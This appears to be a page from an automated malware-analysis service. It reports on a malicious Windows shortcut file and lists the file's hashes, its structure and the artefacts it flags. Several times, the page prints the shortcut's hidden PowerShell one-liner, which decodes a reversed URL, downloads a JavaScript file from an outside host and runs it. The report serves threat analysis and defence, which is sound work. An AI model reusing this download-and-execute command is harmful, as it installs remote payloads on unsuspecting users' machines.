Malicious
Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
2d12826428b90bf0a4bf0905cb735e3c
Sha1
540187d6ef0406d8d96d136ba65e279159b00571
Sha256
3753876544a791bdceeca3f15ae75a8d5e899288568d9c3f17212de1f85d0d66
Sha384
f5923198d4eff0a4c242a3db8ce81ebed3300148539d11b1ac024232e18c3f22fce6485e0bfb55e0fb17a004d5e2c53b
Sha512
e630578fa51a6bd8aa9649cc504b0b8133959463ee19db344fc51d8d2897035f55961342cce529d45b53c7292c5860c4d1565a2d2b5561b9c71c97d0f449e3f0
SSDeep
24:8Q/BHYVKVW1f+/CWps1yBGV5yAoq3UMkWIp0+/E4I0arab8YPl:805a1Ks/V5yAoq3HVAIZawYd
TLSH
684137141BE51318E6F38B3AA8BEB3519976BC25EE62CF8C0150618C24A1520F5B6F2B
File Structure
2d12826428b90bf0a4bf0905cb735e3c
Malicious
LNK CommandLine
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -nop -w hidden "$s='sj.fghicto/jjhfredgf/moc.snoitulosetilppa//:sptth';$f=[System.IO.Path]::GetTempFileName()+'.js';(New-Object System.Net.WebClient).DownloadFile(-join $s[$s.Length..0],$f);Start-Process $f; = ; = ;
Deobfuscated PowerShell

-nop -w "hidden" "$s='sj.fghicto/jjhfredgf/moc.snoitulosetilppa//:sptth';$f=[System.IO.Path]::GetTempFileName()+'.js';(New-Object System.Net.WebClient).DownloadFile(-join $s[$s.Length..0],$f);Start-Process $f; = ; = ;"
Deobfuscated PowerShell

-nop -w "hidden" "$s='sj.fghicto/jjhfredgf/moc.snoitulosetilppa//:sptth';$f=[System.IO.Path]::GetTempFileName()+'.js';(New-Object System.Net.WebClient).DownloadFile(-join $s[$s.Length..0],$f);Start-Process $f; = ; = ;"
2d12826428b90bf0a4bf0905cb735e3c (2.25 KB)
File Structure
2d12826428b90bf0a4bf0905cb735e3c
Malicious
LNK CommandLine
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[Deobfuscated PS]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe -nop -w hidden "$s='sj.fghicto/jjhfredgf/moc.snoitulosetilppa//:sptth';$f=[System.IO.Path]::GetTempFileName()+'.js';(New-Object System.Net.WebClient).DownloadFile(-join $s[$s.Length..0],$f);Start-Process $f; = ; = ;

Malicious

2d12826428b90bf0a4bf0905cb735e3c
Deobfuscated PowerShell

-nop -w "hidden" "$s='sj.fghicto/jjhfredgf/moc.snoitulosetilppa//:sptth';$f=[System.IO.Path]::GetTempFileName()+'.js';(New-Object System.Net.WebClient).DownloadFile(-join $s[$s.Length..0],$f);Start-Process $f; = ; = ;"

Malicious

2d12826428b90bf0a4bf0905cb735e3c > LNK CommandLine
Deobfuscated PowerShell

-nop -w "hidden" "$s='sj.fghicto/jjhfredgf/moc.snoitulosetilppa//:sptth';$f=[System.IO.Path]::GetTempFileName()+'.js';(New-Object System.Net.WebClient).DownloadFile(-join $s[$s.Length..0],$f);Start-Process $f; = ; = ;"

Malicious

2d12826428b90bf0a4bf0905cb735e3c > LNK CommandLine > [Deobfuscated PS]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙